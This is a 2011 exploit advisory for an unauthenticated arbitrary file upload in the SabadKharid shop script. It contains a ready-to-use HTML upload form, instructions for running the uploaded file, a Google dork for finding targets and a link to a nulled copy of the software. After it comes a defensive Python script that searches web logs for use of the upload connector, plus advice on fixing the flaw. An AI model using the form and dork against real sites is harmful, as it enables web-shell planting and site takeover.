+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Author : St493r
[#] Contact : St493r@gmail.com
[#] Title : SabadKharid Remote Arbitrary File Upload Exploit
[#] Vendor : http://sabadkharid.com
[#] Software : http://dl.p30vel.ir/scripts/sabadkharid-professional-nulled-p30vel.zip
[#] Tested On : Linux
[#] Date : 28 - 09 - 2011
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Vulnerability File : /wysiwyg/editor/filemanager/upload/php/upload.php
[#] Exploit : Exploit.html
<strong>SabadKharid Remote Arbitrary File Upload Exploit</strong>
<form enctype="multipart/form-data" action="http://TARGET/wysiwyg/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
<input name="NewFile" type="file">
<input type="submit" value="submit">
</form>
You can execute your uploaded file from : http://TARGET/userfiles/yourfile
You can upload any file with any suffix
Google dork : Powered by Sabadkharid , inurl:"index.php?register"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Thanks To All Iranian Hackers
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
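
For defenders, the two paths named in this advisory are enough to hunt through web server access logs for use of the upload connector and for requests to script-like files under /userfiles/. The following is an added example, not part of the original advisory or of the vendor's code: it assumes Apache/nginx "combined" log format, and the function name, extension list and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Both paths come from the advisory; the extension list is an assumption.
UPLOAD_PATH = "/wysiwyg/editor/filemanager/upload/php/upload.php"
USERFILES_PREFIX = "/userfiles/"
# Matches shell.php and also double extensions such as doc.php.txt.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pl|py|cgi|asp|aspx|jsp|sh)(\.|$)", re.I)

# combined format: ip ident user [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')

def normalise(target):
    """Drop the query string, URL-decode, collapse repeated slashes, lowercase."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()

def find_upload_abuse(lines):
    """Return (kind, ip, time, target, status) tuples for POSTs to the upload
    connector and for requests to script-like names under /userfiles/."""
    findings, uploaders = [], set()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, ts, method, target, status = m.groups()
        path = normalise(target)
        if method == "POST" and path == UPLOAD_PATH:
            uploaders.add(ip)
            findings.append(("upload_post", ip, ts, target, int(status)))
        elif path.startswith(USERFILES_PREFIX) and SCRIPT_EXT.search(path):
            # Same client that posted to the connector earlier is higher priority.
            kind = "script_hit_after_upload" if ip in uploaders else "script_hit"
            findings.append((kind, ip, ts, target, int(status)))
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Sep/2011:10:01:02 +0000] "POST /wysiwyg/editor/filemanager/upload/php/upload.php?Type=Media HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [28/Sep/2011:10:01:09 +0000] "GET /userfiles/up.php?x=1 HTTP/1.1" 200 45 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [28/Sep/2011:10:02:00 +0000] "GET /userfiles/banner.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [28/Sep/2011:10:03:00 +0000] "GET /userfiles/doc.PHP.txt HTTP/1.1" 404 0 "-" "curl/7.21"',
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

A 2xx status on a script-like name under /userfiles/ means the file exists and was served, so it warrants inspection of that file on disk. Removing or access-restricting the upload connector and disabling script execution in /userfiles/ close the path the advisory describes.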